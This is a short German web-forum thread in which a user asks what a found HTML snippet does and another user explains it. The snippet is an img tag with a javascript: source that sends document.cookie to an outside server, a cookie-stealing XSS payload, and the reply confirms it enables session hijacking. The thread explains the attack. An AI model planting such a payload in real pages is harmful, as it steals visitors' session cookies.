Nico146: <img src="javascript:...+escape(document.cookie);">

SELF-Forum

<img src="javascript:...+escape(document.cookie);">

Nico146
Informationen zu den Bewertungsregeln

Hallo,

ich habe dieses Snippet im Web gefunden, was richtet es an oder was soll es demonstrieren? Cookie-Diebstahl per Image-Link?

<img width="1" height="1" src="javascript:document.images.bild.src='http://www.server.com/get.php?'+escape(document.cookie);" name="bild">

Danke,
Nico

Beitrag melden
Informationen zu den Bewertungsregeln

  1. <img src="javascript:...+escape(document.cookie);">

    LX
    Informationen zu den Bewertungsregeln

    Das ist ein klassischer Statistik-Pixel, welcher zudem noch die gesetzten Cookies an www.server.com übermittelt.

    Und ja, man kann mit derartigem Code durchaus die Cookie-Daten von fremden Seiten stehlen, etwa zum Session-Hijacking.

    Gruß, LX

    --
    X-Self-Code: sh:( fo:) ch:~ rl:° br:> n4:& ie:% mo:) va:) de:] zu:) fl:{ ss:) ls:~ js:|
    X-Self-Code-Url: http://emmanuel.dammerer.at/selfcode.html
    X-Will-Answer-Email: Unusual
    X-Please-Search-Archive-First: Absolutely Yes
    Beitrag melden
    Informationen zu den Bewertungsregeln